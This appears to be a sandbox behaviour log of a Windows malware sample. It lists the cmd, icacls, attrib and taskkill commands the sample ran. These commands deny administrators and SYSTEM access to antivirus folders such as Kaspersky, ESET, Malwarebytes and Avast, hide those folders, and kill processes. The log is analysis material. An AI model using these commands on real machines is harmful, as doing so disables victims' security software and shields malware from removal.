- C:\Windows\SysWOW64\icacls.exe | icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
- C:\Windows\SysWOW64\icacls.exe | icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
- C:\Windows\SysWOW64\icacls.exe | icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F) | Modifies file permissions
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
- C:\Windows\SysWOW64\icacls.exe | icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F) | Modifies file permissions
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny система:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny система:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.batDrops file in Drivers directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAKDelays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAKDelays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /FKills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /FKills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\WindowsViews/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM iediagcmd.exe /T /FKills process with taskkill
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\360\Total Security"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurityViews/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safeViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\AviraViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESETViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\Malwarebytes"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\MB3Install"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\KVRT_Data"Views/modifies file attributes
-
